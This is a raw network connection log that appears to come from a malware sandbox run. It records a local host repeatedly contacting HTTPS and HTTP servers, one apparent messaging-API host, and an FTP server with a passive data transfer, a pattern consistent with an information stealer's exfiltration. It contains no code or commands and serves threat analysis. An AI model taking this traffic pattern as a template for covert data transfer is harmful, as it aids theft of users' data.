Oct 3, 2024 09:16:30.996226072 CEST	49712	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:30.996475935 CEST	49712	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:30.996488094 CEST	443	49712	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:31.125066042 CEST	49711	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:31.470777988 CEST	443	49712	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:31.486148119 CEST	49712	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:31.486188889 CEST	443	49712	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:31.626004934 CEST	443	49712	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:31.626106024 CEST	443	49712	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:31.626178026 CEST	49712	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:31.626636028 CEST	49712	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:31.632611990 CEST	49711	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:31.634700060 CEST	49713	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:31.637892008 CEST	80	49711	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:31.638106108 CEST	49711	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:31.639525890 CEST	80	49713	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:31.639595985 CEST	49713	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:31.639698982 CEST	49713	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:31.644488096 CEST	80	49713	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:32.105354071 CEST	80	49713	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:32.106687069 CEST	49714	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:32.106731892 CEST	443	49714	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:32.107115984 CEST	49714	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:32.107115984 CEST	49714	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:32.107155085 CEST	443	49714	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:32.281413078 CEST	49713	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:32.561393023 CEST	443	49714	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:32.563520908 CEST	49714	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:32.563555002 CEST	443	49714	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:32.707818031 CEST	443	49714	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:32.707946062 CEST	443	49714	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:32.708434105 CEST	49714	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:32.709155083 CEST	49714	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:32.713291883 CEST	49715	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:32.713294983 CEST	49713	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:32.718117952 CEST	80	49715	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:32.718259096 CEST	49715	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:32.718395948 CEST	80	49713	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:32.718421936 CEST	49715	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:32.718499899 CEST	49713	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:32.723407984 CEST	80	49715	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:33.174551010 CEST	80	49715	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:33.181967974 CEST	49716	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:33.181982994 CEST	443	49716	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:33.182063103 CEST	49716	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:33.182465076 CEST	49716	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:33.182481050 CEST	443	49716	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:33.218825102 CEST	49715	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:33.640532970 CEST	443	49716	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:33.710621119 CEST	49716	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:33.710669041 CEST	443	49716	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:34.012458086 CEST	443	49716	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:34.012588978 CEST	443	49716	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:34.012661934 CEST	49716	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:34.025079966 CEST	49716	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:34.099883080 CEST	49715	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:34.105108023 CEST	80	49715	193.122.130.0	192.168.2.7
Oct 3, 2024 09:16:34.105175018 CEST	49715	80	192.168.2.7	193.122.130.0
Oct 3, 2024 09:16:34.110161066 CEST	49717	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:34.115242004 CEST	80	49717	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:34.115329027 CEST	49717	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:34.121454954 CEST	49717	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:34.126486063 CEST	80	49717	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:35.101963043 CEST	80	49717	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:35.103077888 CEST	49719	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:35.103138924 CEST	443	49719	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:35.103203058 CEST	49719	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:35.103507996 CEST	49719	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:35.103523016 CEST	443	49719	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:35.130139112 CEST	80	49717	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:35.130194902 CEST	49717	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:35.582861900 CEST	443	49719	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:35.610723972 CEST	49719	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:35.610771894 CEST	443	49719	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:35.635366917 CEST	49721	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:35.640348911 CEST	80	49721	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:35.640722990 CEST	49721	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:35.643624067 CEST	49721	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:35.648864985 CEST	80	49721	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:35.738507032 CEST	443	49719	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:35.738760948 CEST	443	49719	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:35.738821030 CEST	49719	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:35.739197016 CEST	49719	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:35.742619991 CEST	49717	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:35.744379997 CEST	49722	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:35.753443003 CEST	80	49717	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:35.753693104 CEST	49717	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:35.755192995 CEST	80	49722	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:35.755270958 CEST	49722	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:35.755408049 CEST	49722	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:35.763582945 CEST	80	49722	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:37.442477942 CEST	80	49721	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:37.446181059 CEST	49721	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:37.451191902 CEST	80	49721	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:37.599014044 CEST	80	49722	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:37.600245953 CEST	49725	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:37.600297928 CEST	443	49725	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:37.600481033 CEST	49725	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:37.600754976 CEST	49725	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:37.600768089 CEST	443	49725	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:37.734532118 CEST	49722	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:38.056952953 CEST	443	49725	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:38.084228992 CEST	49725	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:38.084269047 CEST	443	49725	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:38.205907106 CEST	443	49725	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:38.206027985 CEST	443	49725	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:38.206104040 CEST	49725	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:38.206629992 CEST	49725	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:38.209610939 CEST	49722	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:38.210896969 CEST	49726	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:38.214941025 CEST	80	49722	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:38.215055943 CEST	49722	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:38.216506004 CEST	80	49726	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:38.216598034 CEST	49726	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:38.216753006 CEST	49726	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:38.221549034 CEST	80	49726	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:38.949093103 CEST	80	49721	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:39.000117064 CEST	49721	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:40.139075994 CEST	49727	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:40.139139891 CEST	443	49727	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:40.139211893 CEST	49727	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:40.150933981 CEST	49727	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:40.150969028 CEST	443	49727	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:40.578283072 CEST	80	49726	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:40.579687119 CEST	49728	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:40.579732895 CEST	443	49728	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:40.579801083 CEST	49728	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:40.580058098 CEST	49728	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:40.580075979 CEST	443	49728	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:40.625109911 CEST	49726	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:40.626519918 CEST	443	49727	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:40.626590014 CEST	49727	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:40.628673077 CEST	49727	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:40.628691912 CEST	443	49727	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:40.629091978 CEST	443	49727	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:40.671983004 CEST	49727	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:40.759648085 CEST	49727	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:40.803406954 CEST	443	49727	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:40.870134115 CEST	443	49727	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:40.870245934 CEST	443	49727	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:40.870338917 CEST	49727	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:40.875400066 CEST	49727	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:40.879057884 CEST	49721	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:40.883966923 CEST	80	49721	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:41.043975115 CEST	443	49728	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:41.045605898 CEST	49728	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:41.045634031 CEST	443	49728	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:41.180036068 CEST	443	49728	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:41.180155993 CEST	443	49728	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:41.180219889 CEST	49728	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:41.180641890 CEST	49728	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:41.205063105 CEST	49729	443	192.168.2.7	149.154.167.220
Oct 3, 2024 09:16:41.205112934 CEST	443	49729	149.154.167.220	192.168.2.7
Oct 3, 2024 09:16:41.205169916 CEST	49729	443	192.168.2.7	149.154.167.220
Oct 3, 2024 09:16:41.205652952 CEST	49729	443	192.168.2.7	149.154.167.220
Oct 3, 2024 09:16:41.205667019 CEST	443	49729	149.154.167.220	192.168.2.7
Oct 3, 2024 09:16:41.850087881 CEST	443	49729	149.154.167.220	192.168.2.7
Oct 3, 2024 09:16:41.850199938 CEST	49729	443	192.168.2.7	149.154.167.220
Oct 3, 2024 09:16:41.853355885 CEST	49729	443	192.168.2.7	149.154.167.220
Oct 3, 2024 09:16:41.853368998 CEST	443	49729	149.154.167.220	192.168.2.7
Oct 3, 2024 09:16:41.853750944 CEST	443	49729	149.154.167.220	192.168.2.7
Oct 3, 2024 09:16:41.855554104 CEST	49729	443	192.168.2.7	149.154.167.220
Oct 3, 2024 09:16:41.899430037 CEST	443	49729	149.154.167.220	192.168.2.7
Oct 3, 2024 09:16:42.097129107 CEST	443	49729	149.154.167.220	192.168.2.7
Oct 3, 2024 09:16:42.097198963 CEST	443	49729	149.154.167.220	192.168.2.7
Oct 3, 2024 09:16:42.097311974 CEST	49729	443	192.168.2.7	149.154.167.220
Oct 3, 2024 09:16:42.101592064 CEST	49729	443	192.168.2.7	149.154.167.220
Oct 3, 2024 09:16:43.025032997 CEST	80	49721	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:43.027307987 CEST	49730	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:43.027352095 CEST	443	49730	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:43.027631998 CEST	49730	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:43.027744055 CEST	49730	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:43.027751923 CEST	443	49730	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:43.078197956 CEST	49721	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:43.493618965 CEST	443	49730	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:43.497294903 CEST	49730	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:43.497314930 CEST	443	49730	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:43.623142004 CEST	443	49730	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:43.623255968 CEST	443	49730	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:43.626185894 CEST	49730	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:43.626581907 CEST	49730	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:43.629966021 CEST	49721	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:43.631031990 CEST	49731	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:43.635459900 CEST	80	49721	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:43.636024952 CEST	80	49731	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:43.636116028 CEST	49721	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:43.636138916 CEST	49731	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:43.636306047 CEST	49731	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:43.641112089 CEST	80	49731	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:44.963219881 CEST	80	49731	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:45.005727053 CEST	49732	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:45.005784035 CEST	443	49732	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:45.006259918 CEST	49732	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:45.006326914 CEST	49732	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:45.006335974 CEST	443	49732	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:45.015722036 CEST	49731	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:45.471312046 CEST	443	49732	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:45.515868902 CEST	49732	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:45.570663929 CEST	49732	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:45.570683956 CEST	443	49732	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:45.677278042 CEST	443	49732	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:45.677385092 CEST	443	49732	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:45.677582026 CEST	49732	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:45.684572935 CEST	49732	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:45.690495014 CEST	49733	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:45.695463896 CEST	80	49733	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:45.695560932 CEST	49733	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:45.695868969 CEST	49733	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:45.700841904 CEST	80	49733	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:47.293956995 CEST	49726	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:48.158533096 CEST	80	49733	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:48.159317017 CEST	49734	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:48.160248041 CEST	49735	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:48.160284042 CEST	443	49735	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:48.160348892 CEST	49735	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:48.160573006 CEST	49735	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:48.160586119 CEST	443	49735	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:48.166676998 CEST	21	49734	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:48.166750908 CEST	49734	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:48.168709993 CEST	49734	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:48.173671961 CEST	21	49734	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:48.173739910 CEST	49734	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:48.203253984 CEST	49733	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:48.618813038 CEST	443	49735	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:48.627315044 CEST	49735	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:48.627334118 CEST	443	49735	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:48.759433031 CEST	443	49735	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:48.759533882 CEST	443	49735	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:48.759748936 CEST	49735	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:48.835870981 CEST	49735	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:48.993597031 CEST	49733	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:48.993628979 CEST	49736	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:48.998891115 CEST	80	49736	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:48.998977900 CEST	80	49733	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:48.998991013 CEST	49736	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:48.999042034 CEST	49733	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:48.999166012 CEST	49736	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:49.004062891 CEST	80	49736	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:49.675026894 CEST	49737	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:49.693658113 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:49.693805933 CEST	49737	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:49.864075899 CEST	80	49736	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:49.865583897 CEST	49738	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:49.865632057 CEST	443	49738	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:49.865730047 CEST	49738	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:49.865953922 CEST	49738	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:49.865971088 CEST	443	49738	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:49.906367064 CEST	49736	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:50.377252102 CEST	443	49738	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:50.379117012 CEST	49738	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:50.379152060 CEST	443	49738	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:50.544749975 CEST	443	49738	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:50.544883966 CEST	443	49738	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:50.544965029 CEST	49738	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:50.545367002 CEST	49738	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:50.549504995 CEST	49739	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:50.549618006 CEST	49736	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:50.555258036 CEST	80	49739	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:50.555335999 CEST	49739	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:50.555437088 CEST	49739	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:50.555797100 CEST	80	49736	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:50.557564974 CEST	49736	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:50.562315941 CEST	80	49739	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:50.589318037 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:50.596858978 CEST	49737	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:50.601928949 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:50.959996939 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:50.960336924 CEST	49737	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:50.996332884 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:51.574934006 CEST	80	49739	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:51.576508999 CEST	49740	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:51.576555967 CEST	443	49740	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:51.576628923 CEST	49740	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:51.576924086 CEST	49740	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:51.576935053 CEST	443	49740	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:51.625164032 CEST	49739	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:51.658968925 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:51.659131050 CEST	49737	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:51.670784950 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:52.020490885 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:52.020718098 CEST	49737	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:52.031291008 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:52.079946995 CEST	443	49740	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:52.081674099 CEST	49740	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:52.081715107 CEST	443	49740	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:52.215301991 CEST	443	49740	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:52.215416908 CEST	443	49740	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:52.215610027 CEST	49740	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:52.216026068 CEST	49740	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:52.219255924 CEST	49739	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:52.220452070 CEST	49741	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:52.229406118 CEST	80	49739	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:52.229496002 CEST	49739	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:52.231920958 CEST	80	49741	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:52.232069016 CEST	49741	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:52.232251883 CEST	49741	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:52.261724949 CEST	80	49741	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:52.371349096 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:52.371491909 CEST	49737	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:52.377298117 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:52.721925020 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:52.722063065 CEST	49737	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:52.748981953 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:53.372594118 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:53.372623920 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:53.372817039 CEST	49737	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:53.373269081 CEST	49742	43366	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:53.380516052 CEST	43366	49742	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:53.380595922 CEST	49742	43366	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:53.380671024 CEST	49737	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:53.386034012 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:54.093714952 CEST	80	49741	132.226.8.169	192.168.2.7
Oct 3, 2024 09:16:54.095098972 CEST	49743	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:54.095144987 CEST	443	49743	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:54.095215082 CEST	49743	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:54.095423937 CEST	49743	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:54.095436096 CEST	443	49743	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:54.140916109 CEST	49741	80	192.168.2.7	132.226.8.169
Oct 3, 2024 09:16:54.289454937 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:54.289854050 CEST	49742	43366	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:54.289901972 CEST	49742	43366	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:54.307720900 CEST	43366	49742	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:54.309246063 CEST	43366	49742	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:54.309329033 CEST	49742	43366	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:54.343916893 CEST	49737	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:54.589421034 CEST	443	49743	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:54.591151953 CEST	49743	443	192.168.2.7	188.114.96.3
Oct 3, 2024 09:16:54.591208935 CEST	443	49743	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:54.661472082 CEST	21	49737	119.18.54.39	192.168.2.7
Oct 3, 2024 09:16:54.703274012 CEST	49737	21	192.168.2.7	119.18.54.39
Oct 3, 2024 09:16:54.749871969 CEST	443	49743	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:54.749974012 CEST	443	49743	188.114.96.3	192.168.2.7
Oct 3, 2024 09:16:54.750073910 CEST	49743	443	192.168.2.7	188.114.96.3
